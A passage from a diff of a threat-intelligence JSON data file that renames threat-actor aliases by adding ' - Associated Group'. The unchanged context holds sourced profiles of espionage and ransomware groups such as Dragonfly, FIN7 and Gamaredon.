2022](https://app.tidalcyber.com/references/27e7d347-9d85-4897-9e04-33f58acc5687)]", @@ -3743,7 +3743,7 @@ } ], "uuid": "5d23fa1e-ece1-4111-a5e3-7d9eb3a8c214", - "value": "TG-4192" + "value": "TG-4192 - Associated Group" }, { "description": "[[Secureworks IRON LIBERTY July 2019](https://app.tidalcyber.com/references/c666200d-5392-43f2-9ad0-1268d7b2e86f)][[Secureworks MCMD July 2019](https://app.tidalcyber.com/references/f7364cfc-5a3b-4538-80d0-cae65f3c6592)][[Secureworks Karagany July 2019](https://app.tidalcyber.com/references/61c05edf-24aa-4399-8cdf-01d27f6595a1)][[UK GOV FSB Factsheet April 2022](https://app.tidalcyber.com/references/27e7d347-9d85-4897-9e04-33f58acc5687)]", @@ -3757,7 +3757,7 @@ } ], "uuid": "8e252d57-69fb-4e48-a094-838e24fe620e", - "value": "IRON LIBERTY" + "value": "IRON LIBERTY - Associated Group" }, { "description": "[Dragonfly](https://app.tidalcyber.com/groups/472080b0-e3d4-4546-9272-c4359fe856e1) is a cyber espionage group that has been attributed to Russia's Federal Security Service (FSB) Center 16.[[DOJ Russia Targeting Critical Infrastructure March 2022](https://app.tidalcyber.com/references/768a0ec6-b767-4044-acad-82834508640f)][[UK GOV FSB Factsheet April 2022](https://app.tidalcyber.com/references/27e7d347-9d85-4897-9e04-33f58acc5687)] Active since at least 2010, [Dragonfly](https://app.tidalcyber.com/groups/472080b0-e3d4-4546-9272-c4359fe856e1) has targeted defense and aviation companies, government entities, companies related to industrial control systems, and critical infrastructure sectors worldwide through supply chain, spearphishing, and drive-by compromise attacks.[[Symantec Dragonfly](https://app.tidalcyber.com/references/9514c5cd-2ed6-4dbf-aa9e-1c425e969226)][[Secureworks IRON LIBERTY July 2019](https://app.tidalcyber.com/references/c666200d-5392-43f2-9ad0-1268d7b2e86f)][[Symantec Dragonfly Sept 2017](https://app.tidalcyber.com/references/11bbeafc-ed5d-4d2b-9795-a0a9544fb64e)][[Fortune Dragonfly 2.0 Sept 2017](https://app.tidalcyber.com/references/b56c5b41-b8e0-4fef-a6d8-183bb283dc7c)][[Gigamon Berserk Bear October 2021](https://app.tidalcyber.com/references/06b6cbe3-8e35-4594-b36f-76b503c11520)][[CISA AA20-296A Berserk Bear December 2020](https://app.tidalcyber.com/references/c7bc4b25-2043-4f43-8320-590f82d0e09a)][[Symantec Dragonfly 2.0 October 2017](https://app.tidalcyber.com/references/a0439d4a-a3ea-4be5-9a01-f223ca259681)]", @@ -3869,7 +3869,7 @@ } ], "uuid": "f52f1ae7-3df5-479c-b487-b214c2946fe3", - "value": "TAG-22" + "value": "TAG-22 - Associated Group" }, { "description": "[Earth Lusca](https://app.tidalcyber.com/groups/646e35d2-75de-4c1d-8ad3-616d3e155c5e) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://app.tidalcyber.com/groups/646e35d2-75de-4c1d-8ad3-616d3e155c5e) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://app.tidalcyber.com/groups/646e35d2-75de-4c1d-8ad3-616d3e155c5e) operations may be financially motivated.[[TrendMicro EarthLusca 2022](https://app.tidalcyber.com/references/f6e1bffd-e35b-4eae-b9bf-c16a82bf7004)]\n\n[Earth Lusca](https://app.tidalcyber.com/groups/646e35d2-75de-4c1d-8ad3-616d3e155c5e) has used malware commonly used by other Chinese threat groups, including [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) and the [Winnti Group](https://app.tidalcyber.com/groups/6932662a-53a7-4e43-877f-6e940e2d744b) cluster, however security researchers assess [Earth Lusca](https://app.tidalcyber.com/groups/646e35d2-75de-4c1d-8ad3-616d3e155c5e)'s techniques and infrastructure are separate.[[TrendMicro EarthLusca 2022](https://app.tidalcyber.com/references/f6e1bffd-e35b-4eae-b9bf-c16a82bf7004)]", @@ -3898,7 +3898,7 @@ } ], "uuid": "512f83c6-b369-4d53-82b6-5b27f60e970e", - "value": "Elderwood Gang" + "value": "Elderwood Gang - Associated Group" }, { "description": "[[CSM Elderwood Sept 2012](https://app.tidalcyber.com/references/6b79006d-f6de-489c-82fa-8c3c28d652ef)]", @@ -3912,7 +3912,7 @@ } ], "uuid": "a34e5489-2c79-4363-8cbb-2073f310cadc", - "value": "Beijing Group" + "value": "Beijing Group - Associated Group" }, { "description": "[[CSM Elderwood Sept 2012](https://app.tidalcyber.com/references/6b79006d-f6de-489c-82fa-8c3c28d652ef)]", @@ -3926,7 +3926,7 @@ } ], "uuid": "54369a73-2715-48b3-8897-26380a48683e", - "value": "Sneaky Panda" + "value": "Sneaky Panda - Associated Group" }, { "description": "[Elderwood](https://app.tidalcyber.com/groups/51146bb6-7478-44a3-8f08-19adcdceffca) is a suspected Chinese cyber espionage group that was reportedly responsible for the 2009 Google intrusion known as Operation Aurora. [[Security Affairs Elderwood Sept 2012](https://app.tidalcyber.com/references/ebfc56c5-0490-4b91-b49f-548c00a59162)] The group has targeted defense organizations, supply chain manufacturers, human rights and nongovernmental organizations (NGOs), and IT service providers. [[Symantec Elderwood Sept 2012](https://app.tidalcyber.com/references/5e908748-d260-42f1-a599-ac38b4e22559)] [[CSM Elderwood Sept 2012](https://app.tidalcyber.com/references/6b79006d-f6de-489c-82fa-8c3c28d652ef)]", @@ -3988,7 +3988,7 @@ } ], "uuid": "58a29d72-e635-443b-868d-5970497a02be", - "value": "Saint Bear" + "value": "Saint Bear - Associated Group" }, { "description": "[[CrowdStrike Ember Bear Profile March 2022](https://app.tidalcyber.com/references/0639c340-b495-4d91-8418-3069f3fe0df1)]", @@ -4002,7 +4002,7 @@ } ], "uuid": "458c2ae1-5ddf-40d6-9f57-e38ce07f7af0", - "value": "Lorec53" + "value": "Lorec53 - Associated Group" }, { "description": "[[Mandiant UNC2589 March 2022](https://app.tidalcyber.com/references/63d89139-9dd4-4ed6-bf6e-8cd872c5d034)]", @@ -4016,7 +4016,7 @@ } ], "uuid": "d3f83fae-e133-4e00-a53b-f881f0a1f6e0", - "value": "UNC2589" + "value": "UNC2589 - Associated Group" }, { "description": "[[CrowdStrike Ember Bear Profile March 2022](https://app.tidalcyber.com/references/0639c340-b495-4d91-8418-3069f3fe0df1)]", @@ -4030,7 +4030,7 @@ } ], "uuid": "00c980c7-47ad-409d-bb62-374e5a078de8", - "value": "UAC-0056" + "value": "UAC-0056 - Associated Group" }, { "description": "[[CrowdStrike Ember Bear Profile March 2022](https://app.tidalcyber.com/references/0639c340-b495-4d91-8418-3069f3fe0df1)]", @@ -4044,7 +4044,7 @@ } ], "uuid": "8196a760-2ea4-40a0-8229-405f43247543", - "value": "Lorec Bear" + "value": "Lorec Bear - Associated Group" }, { "description": "[[CrowdStrike Ember Bear Profile March 2022](https://app.tidalcyber.com/references/0639c340-b495-4d91-8418-3069f3fe0df1)]", @@ -4058,7 +4058,7 @@ } ], "uuid": "097d6980-041e-42b0-b1b0-219f70381167", - "value": "Bleeding Bear" + "value": "Bleeding Bear - Associated Group" }, { "description": "[Ember Bear](https://app.tidalcyber.com/groups/407274be-1820-4a84-939e-629313f4de1d) is a suspected Russian state-sponsored cyber espionage group that has been active since at least March 2021. [Ember Bear](https://app.tidalcyber.com/groups/407274be-1820-4a84-939e-629313f4de1d) has primarily focused their operations against Ukraine and Georgia, but has also targeted Western European and North American foreign ministries, pharmaceutical companies, and financial sector organizations. Security researchers assess [Ember Bear](https://app.tidalcyber.com/groups/407274be-1820-4a84-939e-629313f4de1d) likely conducted the [WhisperGate](https://app.tidalcyber.com/software/791f0afd-c2c4-4e23-8aee-1d14462667f5) destructive wiper attacks against Ukraine in early 2022.[[CrowdStrike Ember Bear Profile March 2022](https://app.tidalcyber.com/references/0639c340-b495-4d91-8418-3069f3fe0df1)][[Mandiant UNC2589 March 2022](https://app.tidalcyber.com/references/63d89139-9dd4-4ed6-bf6e-8cd872c5d034)][[Palo Alto Unit 42 OutSteel SaintBot February 2022 ](https://app.tidalcyber.com/references/b0632490-76be-4018-982d-4b73b3d13881)] ", @@ -4245,7 +4245,7 @@ } ], "uuid": "4a4dfd05-0243-4a4d-a4f5-043a8098034d", - "value": "Pistachio Tempest" + "value": "Pistachio Tempest - Associated Group" }, { "description": "FIN12 is a financially motivated threat actor group believed to be responsible for multiple high-profile ransomware attacks since 2018. The group has attacked victims in various sectors and locations, including multiple attacks on healthcare entities. An October 2021 Mandiant assessment indicated 85% of the group's victims were U.S.-based, and the large majority of them were large enterprises with more than $300 million in annual revenue. The report also assessed that initial access brokers partnering with FIN12 target a wider range of organizations and allow FIN12 actors to select victims for further malicious activity.[[Mandiant FIN12 Group Profile October 07 2021](/references/7af84b3d-bbd6-449f-b29b-2f14591c9f05)]\n\nFIN12's toolset has reportedly shifted over time. Cobalt Strike has been observed in most intrusions. While TrickBot and Empire were common post-exploitation tools historically, French authorities observed the group using SystemBC alongside Cobalt Strike during a March 2023 hospital center intrusion. Ryuk, and to a lesser degree Conti, were traditionally used ransomware payloads, with the former used in a series of attacks on U.S. healthcare entities in 2020. However, a French CERT assessment published in 2023 linked the group to multiple more recent incidents it investigated and analyzed, which featured deployment of various ransomware families, including Hive, Nokoyawa, Play, Royal, and BlackCat, along with Emotet and BazarLoader malware for initial footholds.[[Mandiant FIN12 Group Profile October 07 2021](/references/7af84b3d-bbd6-449f-b29b-2f14591c9f05)][[CERTFR-2023-CTI-007](/references/0f4a03c5-79b3-418e-a77d-305d5a32caca)]\n\n**Related Vulnerabilities**: CVE-2023-21746, CVE-2022-24521, CVE-2021-34527, CVE-2019-0708, CVE-2020-1472[[CERTFR-2023-CTI-007](/references/0f4a03c5-79b3-418e-a77d-305d5a32caca)]", @@ -4307,7 +4307,7 @@ } ], "uuid": "0bf8168b-e8b6-547b-ba47-a500a4f64a5b", - "value": "Elephant Beetle" + "value": "Elephant Beetle - Associated Group" }, { "description": "[FIN13](https://app.tidalcyber.com/groups/570198e3-b59c-5772-b1ee-15d7ea14d48a) is a financially motivated cyber threat group that has targeted the financial, retail, and hospitality industries in Mexico and Latin America, as early as 2016. [FIN13](https://app.tidalcyber.com/groups/570198e3-b59c-5772-b1ee-15d7ea14d48a) achieves its objectives by stealing intellectual property, financial data, mergers and acquisition information, or PII.[[Mandiant FIN13 Aug 2022](https://app.tidalcyber.com/references/ebd9d479-1954-5a4a-b7f0-d5372489733c)][[Sygnia Elephant Beetle Jan 2022](https://app.tidalcyber.com/references/932897a6-0fa4-5be3-bf0b-20d6ddad238e)]", @@ -4393,7 +4393,7 @@ } ], "uuid": "b7091e08-25be-44de-a445-d81ca9fdc073", - "value": "Skeleton Spider" + "value": "Skeleton Spider - Associated Group" }, { "description": "[[Security Intelligence ITG08 April 2020](https://app.tidalcyber.com/references/32569f59-14fb-4581-8a42-3bf49fb189e9)]", @@ -4407,7 +4407,7 @@ } ], "uuid": "5b35e532-aaed-4e3b-bb9f-452e3c7fa8bb", - "value": "Magecart Group 6" + "value": "Magecart Group 6 - Associated Group" }, { "description": "[[Security Intelligence More Eggs Aug 2019](https://app.tidalcyber.com/references/f0a0286f-adb9-4a6e-85b5-5b0f45e6fbf3)]", @@ -4421,7 +4421,7 @@ } ], "uuid": "6e65d12f-a1d8-4f49-9e47-c6a58f950e7f", - "value": "ITG08" + "value": "ITG08 - Associated Group" }, { "description": "[FIN6](https://app.tidalcyber.com/groups/fcaadc12-7c17-4946-a9dc-976ed610854c) is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors.[[FireEye FIN6 April 2016](https://app.tidalcyber.com/references/8c0997e1-b285-42dd-9492-75065eac8f8b)][[FireEye FIN6 Apr 2019](https://app.tidalcyber.com/references/e8a2bc6a-04e3-484e-af67-5f57656c7206)]", @@ -4473,7 +4473,7 @@ } ], "uuid": "89f19c2d-3449-4c67-9f1b-710217bc2a6f", - "value": "GOLD NIAGARA" + "value": "GOLD NIAGARA - Associated Group" }, { "description": "ITG14 shares campaign overlap with [FIN7](https://app.tidalcyber.com/groups/4348c510-50fc-4448-ab8d-c8cededd19ff).[[IBM Ransomware Trends September 2020](https://app.tidalcyber.com/references/eb767436-4a96-4e28-bd34-944842d7593e)]", @@ -4487,7 +4487,7 @@ } ], "uuid": "f67c4cea-6f4e-43c9-ab46-2075a57c4aaf", - "value": "ITG14" + "value": "ITG14 - Associated Group" }, { "description": "[[CrowdStrike Carbon Spider August 2021](https://app.tidalcyber.com/references/36f0ddb0-94af-494c-ad10-9d3f75d1d810)]", @@ -4501,7 +4501,7 @@ } ], "uuid": "7bdc9be3-109a-42e5-88ff-6260c6407478", - "value": "Carbon Spider" + "value": "Carbon Spider - Associated Group" }, { "description": "[FIN7](https://app.tidalcyber.com/groups/4348c510-50fc-4448-ab8d-c8cededd19ff) is a financially-motivated threat group that has been active since 2013. [FIN7](https://app.tidalcyber.com/groups/4348c510-50fc-4448-ab8d-c8cededd19ff) has primarily targeted the retail, restaurant, hospitality, software, consulting, financial services, medical equipment, cloud services, media, food and beverage, transportation, and utilities industries in the U.S. A portion of [FIN7](https://app.tidalcyber.com/groups/4348c510-50fc-4448-ab8d-c8cededd19ff) was run out of a front company called Combi Security and often used point-of-sale malware for targeting efforts. Since 2020, [FIN7](https://app.tidalcyber.com/groups/4348c510-50fc-4448-ab8d-c8cededd19ff) shifted operations to a big game hunting (BGH) approach including use of [REvil](https://app.tidalcyber.com/software/9314531e-bf46-4cba-9c19-198279ccf9cd) ransomware and their own Ransomware as a Service (RaaS), Darkside. FIN7 may be linked to the [Carbanak](https://app.tidalcyber.com/groups/72d9bea7-9ca1-43e6-8702-2fb7fb1355de) Group, but there appears to be several groups using [Carbanak](https://app.tidalcyber.com/software/4cb9294b-9e4c-41b9-b640-46213a01952d) malware and are therefore tracked separately.[[FireEye FIN7 March 2017](https://app.tidalcyber.com/references/7987bb91-ec41-42f8-bd2d-dabc26509a08)][[FireEye FIN7 April 2017](https://app.tidalcyber.com/references/6ee27fdb-1753-4fdf-af72-3295b072ff10)][[FireEye CARBANAK June 2017](https://app.tidalcyber.com/references/39105492-6044-460c-9dc9-3d4473ee862e)][[FireEye FIN7 Aug 2018](https://app.tidalcyber.com/references/54e5f23a-5ca6-4feb-8046-db2fb71b400a)][[CrowdStrike Carbon Spider August 2021](https://app.tidalcyber.com/references/36f0ddb0-94af-494c-ad10-9d3f75d1d810)][[Mandiant FIN7 Apr 2022](https://app.tidalcyber.com/references/be9919c0-ca52-593b-aea0-c5e9a262b570)]", @@ -4585,7 +4585,7 @@ } ], "uuid": "5cd4a69b-7a62-5091-be06-e73477878441", - "value": "Syssphinx" + "value": "Syssphinx - Associated Group" }, { "description": "[FIN8](https://app.tidalcyber.com/groups/b3061284-0335-4dcb-9f8e-a3b0412fd46f) is a financially motivated threat group that has been active since at least January 2016, and known for targeting organizations in the hospitality, retail, entertainment, insurance, technology, chemical, and financial sectors. In June 2021, security researchers detected [FIN8](https://app.tidalcyber.com/groups/b3061284-0335-4dcb-9f8e-a3b0412fd46f) switching from targeting point-of-sale (POS) devices to distributing a number of ransomware variants.[[FireEye Obfuscation June 2017](https://app.tidalcyber.com/references/6d1089b7-0efe-4961-8abc-22a882895377)][[FireEye Fin8 May 2016](https://app.tidalcyber.com/references/2079101c-d988-430a-9082-d25c475b2af5)][[Bitdefender Sardonic Aug 2021](https://app.tidalcyber.com/references/8e9d05c9-6783-5738-ac85-a444810a8074)][[Symantec FIN8 Jul 2023](https://app.tidalcyber.com/references/9b08b7f0-1a33-5d76-817f-448fac0d165a)]", @@ -4638,7 +4638,7 @@ } ], "uuid": "70b3c377-6e46-45d1-bc24-edb920ad535d", - "value": "Pioneer Kitten" + "value": "Pioneer Kitten - Associated Group" }, { "description": "[[CISA AA20-259A Iran-Based Actor September 2020](https://app.tidalcyber.com/references/1bbc9446-9214-4fcd-bc7c-bf528370b4f8)][[CrowdStrike PIONEER KITTEN August 2020](https://app.tidalcyber.com/references/4fce29cc-ddab-4b96-b295-83c282a87564)]", @@ -4652,7 +4652,7 @@ } ], "uuid": "89d106ad-e7dc-4b3c-8bbb-b8acbf45d47e", - "value": "UNC757" + "value": "UNC757 - Associated Group" }, { "description": "[[Dragos PARISITE ](https://app.tidalcyber.com/references/15e974db-51a9-4ec1-9725-cff8bb9bc2fa)][[ClearkSky Fox Kitten February 2020](https://app.tidalcyber.com/references/a5ad6321-897a-4adc-9cdd-034a2538e3d6)][[CrowdStrike PIONEER KITTEN August 2020](https://app.tidalcyber.com/references/4fce29cc-ddab-4b96-b295-83c282a87564)]", @@ -4666,7 +4666,7 @@ } ], "uuid": "580af0b1-0ed3-461e-8144-c95364116faa", - "value": "Parisite" + "value": "Parisite - Associated Group" }, { "description": "[Fox Kitten](https://app.tidalcyber.com/groups/7094468a-2310-48b5-ad24-e669152bd66d) is threat actor with a suspected nexus to the Iranian government that has been active since at least 2017 against entities in the Middle East, North Africa, Europe, Australia, and North America. [Fox Kitten](https://app.tidalcyber.com/groups/7094468a-2310-48b5-ad24-e669152bd66d) has targeted multiple industrial verticals including oil and gas, technology, government, defense, healthcare, manufacturing, and engineering.[[ClearkSky Fox Kitten February 2020](https://app.tidalcyber.com/references/a5ad6321-897a-4adc-9cdd-034a2538e3d6)][[CrowdStrike PIONEER KITTEN August 2020](https://app.tidalcyber.com/references/4fce29cc-ddab-4b96-b295-83c282a87564)][[Dragos PARISITE ](https://app.tidalcyber.com/references/15e974db-51a9-4ec1-9725-cff8bb9bc2fa)][[ClearSky Pay2Kitten December 2020](https://app.tidalcyber.com/references/6e09bc1a-8a5d-4512-9176-40eed91af358)]", @@ -4746,7 +4746,7 @@ } ], "uuid": "90e2eeaa-23b5-4bc5-a277-af26f9ee2326", - "value": "Operation Soft Cell" + "value": "Operation Soft Cell - Associated Group" }, { "description": "[GALLIUM](https://app.tidalcyber.com/groups/15ff1ce0-44f0-4f1d-a4ef-83444570e572) is a cyberespionage group that has been active since at least 2012, primarily targeting telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam. Security researchers have identified [GALLIUM](https://app.tidalcyber.com/groups/15ff1ce0-44f0-4f1d-a4ef-83444570e572) as a likely Chinese state-sponsored group, based in part on tools used and TTPs commonly associated with Chinese threat actors.[[Cybereason Soft Cell June 2019](https://app.tidalcyber.com/references/620b7353-0e58-4503-b534-9250a8f5ae3c)][[Microsoft GALLIUM December 2019](https://app.tidalcyber.com/references/5bc76b47-ff68-4031-a347-f2dc0daba203)][[Unit 42 PingPull Jun 2022](https://app.tidalcyber.com/references/ac6491ab-6ef1-4091-8a15-50e2cbafe157)]", @@ -4796,7 +4796,7 @@ } ], "uuid": "24e4dcfa-128c-455f-9eb9-088ec37b31ca", - "value": "Primitive Bear" + "value": "Primitive Bear - Associated Group" }, { "description": "[[Symantec Shuckworm January 2022](https://app.tidalcyber.com/references/3abb9cfb-8927-4447-b904-6ed071787bef)]", @@ -4810,7 +4810,7 @@ } ], "uuid": "a5b946ca-ce53-4011-bf46-975390ab31d0", - "value": "Shuckworm" + "value": "Shuckworm - Associated Group" }, { "description": "[[Secureworks IRON TILDEN Profile](https://app.tidalcyber.com/references/45969d87-02c1-4074-b708-59f4c3e39426)]", @@ -4824,7 +4824,7 @@ } ], "uuid": "27cc58cd-ad07-4921-9dcc-bd3d81ab4164", - "value": "IRON TILDEN" + "value": "IRON TILDEN - Associated Group" }, { "description": "[[Microsoft Actinium February 2022](https://app.tidalcyber.com/references/5ab658db-7f71-4213-8146-e22da54160b3)]", @@ -4838,7 +4838,7 @@ } ], "uuid": "42979c45-dfcb-4be8-8c6b-2428f87fb96b", - "value": "ACTINIUM" + "value": "ACTINIUM - Associated Group" }, { "description": "[[Symantec Shuckworm January 2022](https://app.tidalcyber.com/references/3abb9cfb-8927-4447-b904-6ed071787bef)]", @@ -4852,7 +4852,7 @@ } ], "uuid": "c06e119e-26b7-46f1-bf6c-35b68f091152", - "value": "Armageddon" + "value": "Armageddon - Associated Group" }, { "description": "[[Microsoft Actinium February 2022](https://app.tidalcyber.com/references/5ab658db-7f71-4213-8146-e22da54160b3)]", @@ -4866,7 +4866,7 @@ } ], "uuid": "5c73e944-4ec1-4b9f-92c6-134952b224cd", - "value": "DEV-0157" + "value": "DEV-0157 - Associated Group" }, { "description": "[Gamaredon Group](https://app.tidalcyber.com/groups/41e8b4a4-2d31-46ee-bc56-12375084d067) is a suspected Russian cyber espionage threat group that has targeted military, NGO, judiciary, law enforcement, and non-profit organizations in Ukraine since at least 2013. The name [Gamaredon Group](https://app.tidalcyber.com/groups/41e8b4a4-2d31-46ee-bc56-12375084d067) comes from a misspelling of the word \"Armageddon\", which was detected in the adversary's early campaigns.[[Palo Alto Gamaredon Feb 2017](https://app.tidalcyber.com/references/3f9a6343-1db3-4696-99ed-f22c6eabee71)][[TrendMicro Gamaredon April 2020](https://app.tidalcyber.com/references/3800cfc2-0260-4b36-b629-7a336b9f9f10)][[ESET Gamaredon June 2020](https://app.tidalcyber.com/references/6532664d-2311-4b38-8960-f43762471729)][[Symantec Shuckworm January 2022](https://app.tidalcyber.com/references/3abb9cfb-8927-4447-b904-6ed071787bef)][[Microsoft Actinium February 2022](https://app.tidalcyber.com/references/5ab658db-7f71-4213-8146-e22da54160b3)]\n\nIn November 2021, the Ukrainian government publicly attributed [Gamaredon Group](https://app.tidalcyber.com/groups/41e8b4a4-2d31-46ee-bc56-12375084d067) to Russia's Federal Security Service (FSB) Center 18.[[Bleepingcomputer Gamardeon FSB November 2021](https://app.tidalcyber.com/references/c565b025-df74-40a9-9535-b630ca06f777)][[Microsoft Actinium February 2022](https://app.tidalcyber.com/references/5ab658db-7f71-4213-8146-e22da54160b3)]", @@ -4993,7 +4993,7 @@ } ], "uuid": "7f1fa605-10cc-5317-a88c-b174f3ad7596", - "value": "Pinchy Spider" + "value": "Pinchy Spider - Associated Group" }, { "description": "[GOLD SOUTHFIELD](https://app.tidalcyber.com/groups/b4d068ac-9b68-4cd8-bf0c-019f910ef8e3) is a financially motivated threat group active since at least 2018 that operates the [REvil](https://app.tidalcyber.com/software/9314531e-bf46-4cba-9c19-198279ccf9cd) Ransomware-as-a Service (RaaS). [GOLD SOUTHFIELD](https://app.tidalcyber.com/groups/b4d068ac-9b68-4cd8-bf0c-019f910ef8e3) provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments. By early 2020, [GOLD SOUTHFIELD](https://app.tidalcyber.com/groups/b4d068ac-9b68-4cd8-bf0c-019f910ef8e3) started capitalizing on the new trend of stealing data and further extorting the victim to pay for their data to not get publicly leaked.[[Secureworks REvil September 2019](https://app.tidalcyber.com/references/8f4e2baf-4227-4bbd-bfdb-5598717dcf88)][[Secureworks GandCrab and REvil September 2019](https://app.tidalcyber.com/references/46b5d57b-17be-48ff-b723-406f6a55d84a)][[Secureworks GOLD SOUTHFIELD](https://app.tidalcyber.com/references/01d1ffaa-16b3-41c4-bb5a-afe2b41f1142)][[CrowdStrike Evolution of Pinchy Spider July 2021](https://app.tidalcyber.com/references/7578541b-1ae3-58d0-a8b9-120bd6cd96f5)]", @@ -5070,7 +5070,7 @@ } ], "uuid": "956cc6a9-b4e2-40ec-aa22-5dc90e2ab2d0", - "value": "Operation Exchange Marauder" + "value": "Operation Exchange Marauder - Associated Group" }, { "description": "[HAFNIUM](https://app.tidalcyber.com/groups/1bcc9382-ccfe-4b04-91f3-ef1250df5e5b) is a likely state-sponsored cyber espionage group operating out of China that has been active since at least January 2021. [HAFNIUM](https://app.tidalcyber.com/groups/1bcc9382-ccfe-4b04-91f3-ef1250df5e5b) primarily targets entities in the US across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.[[Microsoft HAFNIUM March 2020](https://app.tidalcyber.com/references/6a986c46-79a3-49c6-94d2-d9b1f5db08f3)][[Volexity Exchange Marauder March 2021](https://app.tidalcyber.com/references/ef0626e9-281c-4770-b145-ffe36e18e369)]", @@ -5117,7 +5117,7 @@ } ], "uuid": "140137f2-039a-4ade-a043-039b2093e25e", - "value": "Lyceum" + "value": "Lyceum - Associated Group" }, { "description": "[[ClearSky Siamesekitten August 2021](https://app.tidalcyber.com/references/9485efce-8d54-4461-b64e-0d15e31fbf8c)]", @@ -5131,7 +5131,7 @@ } ], "uuid": "05b6f4a6-e54d-42db-a47e-4bcfae56c0f6", - "value": "Siamesekitten" + "value": "Siamesekitten - Associated Group" }, { "description": "[[Accenture Lyceum Targets November 2021](https://app.tidalcyber.com/references/127836ce-e459-405d-a75c-32fd5f0ab198)]", @@ -5145,7 +5145,7 @@ } ], "uuid": "16662d03-d9bf-448d-9fef-40af53a2bc76", - "value": "Spirlin" + "value": "Spirlin - Associated Group" }, { "description": "[HEXANE](https://app.tidalcyber.com/groups/eecf7289-294f-48dd-a747-7705820f4735) is a cyber espionage threat group that has targeted oil & gas, telecommunications, aviation, and internet service provider organizations since at least 2017. Targeted companies have been located in the Middle East and Africa, including Israel, Saudi Arabia, Kuwait, Morocco, and Tunisia. [HEXANE](https://app.tidalcyber.com/groups/eecf7289-294f-48dd-a747-7705820f4735)'s TTPs appear similar to [APT33](https://app.tidalcyber.com/groups/99bbbe25-45af-492f-a7ff-7cbc57828bac) and [OilRig](https://app.tidalcyber.com/groups/d01abdb1-0378-4654-aa38-1a4a292703e2) but due to differences in victims and tools it is tracked as a separate entity.[[Dragos Hexane](https://app.tidalcyber.com/references/11838e67-5032-4352-ad1f-81ba0398a14f)][[Kaspersky Lyceum October 2021](https://app.tidalcyber.com/references/b3d13a82-c24e-4b47-b47a-7221ad449859)][[ClearSky Siamesekitten August 2021](https://app.tidalcyber.com/references/9485efce-8d54-4461-b64e-0d15e31fbf8c)][[Accenture Lyceum Targets November 2021](https://app.tidalcyber.com/references/127836ce-e459-405d-a75c-32fd5f0ab198)]", @@ -5203,7 +5203,7 @@ } ], "uuid": "42936511-3367-4000-b700-cba2ed0a5c6c", - "value": "Inception Framework" + "value": "Inception Framework - Associated Group" }, { "description": "[[Kaspersky Cloud Atlas December 2014](https://app.tidalcyber.com/references/41a9b3e3-0953-4bde-9e1d-c2f51de1120e)]", @@ -5217,7 +5217,7 @@ } ], "uuid": "ec26e42e-45f7-4d88-ae4b-f141dd03e192", - "value": "Cloud Atlas" + "value": "Cloud Atlas - Associated Group" }, { "description": "[Inception](https://app.tidalcyber.com/groups/d7c58e7f-f0b0-44c6-b205-5adcfb56f0e6) is a cyber espionage group active since at least 2014. The group has targeted multiple industries and governmental entities primarily in Russia, but has also been active in the United States and throughout Europe, Asia, Africa, and the Middle East.[[Unit 42 Inception November 2018](https://app.tidalcyber.com/references/5cb98fce-f386-4878-b69c-5c6440ad689c)][[Symantec Inception Framework March 2018](https://app.tidalcyber.com/references/166f5c44-7d8c-45d5-8d9f-3b8bd21a2af3)][[Kaspersky Cloud Atlas December 2014](https://app.tidalcyber.com/references/41a9b3e3-0953-4bde-9e1d-c2f51de1120e)]", @@ -5306,7 +5306,7 @@ } ], "uuid": "bc61566f-d467-43bd-bea8-b04d6eb26318", - "value": "Evil Corp" + "value": "Evil Corp - Associated Group" }, { "description": "[Indrik Spider](https://app.tidalcyber.com/groups/3c7ad595-1940-40fc-b9ca-3e649c1e5d87) is a Russia-based cybercriminal group that has been active since at least 2014. [Indrik Spider](https://app.tidalcyber.com/groups/3c7ad595-1940-40fc-b9ca-3e649c1e5d87) initially started with the [Dridex](https://app.tidalcyber.com/software/e3cd4405-b698-41d9-88e4-fff29e7a19e2) banking Trojan, and then by 2017 they began running ransomware operations using [BitPaymer](https://app.tidalcyber.com/software/e7dec940-8701-4c06-9865-5b11c61c046d), [WastedLocker](https://app.tidalcyber.com/software/0ba6ee8d-2b29-4980-8e55-348ea05f00ad), and Hades ransomware. Following U.S. sanctions and an indictment in 2019, [Indrik Spider](https://app.tidalcyber.com/groups/3c7ad595-1940-40fc-b9ca-3e649c1e5d87) changed their tactics and diversified their toolset.[[Crowdstrike Indrik November 2018](https://app.tidalcyber.com/references/0f85f611-90db-43ba-8b71-5d0d4ec8cdd5)][[Crowdstrike EvilCorp March 2021](https://app.tidalcyber.com/references/4b77d313-ef3c-4d2f-bfde-609fa59a8f55)][[Treasury EvilCorp Dec 2019](https://app.tidalcyber.com/references/074a52c4-26d9-4083-9349-c14e2639c1bc)]", @@ -5352,7 +5352,7 @@ } ], "uuid": "3c0dfd27-fc7a-48c5-a431-6f62f3f9319a", - "value": "Vixen Panda" + "value": "Vixen Panda - Associated Group" }, { "description": "[[NCC Group APT15 Alive and Strong](https://app.tidalcyber.com/references/02a50445-de06-40ab-9ea4-da5c37e066cd)][[APT15 Intezer June 2018](https://app.tidalcyber.com/references/0110500c-bf67-43a5-97cb-16eb6c01040b)]", @@ -5366,7 +5366,7 @@ } ], "uuid": "6231a5a9-ca9a-435e-abf3-a78478484513", - "value": "Playful Dragon" + "value": "Playful Dragon - Associated Group" }, { "description": "[[NCC Group APT15 Alive and Strong](https://app.tidalcyber.com/references/02a50445-de06-40ab-9ea4-da5c37e066cd)]", @@ -5380,7 +5380,7 @@ } ], "uuid": "fa320745-a2e5-4f54-8cb6-c0056e18805e", - "value": "APT15" + "value": "APT15 - Associated Group" }, { "description": "[[NCC Group APT15 Alive and Strong](https://app.tidalcyber.com/references/02a50445-de06-40ab-9ea4-da5c37e066cd)]", @@ -5394,7 +5394,7 @@ } ], "uuid": 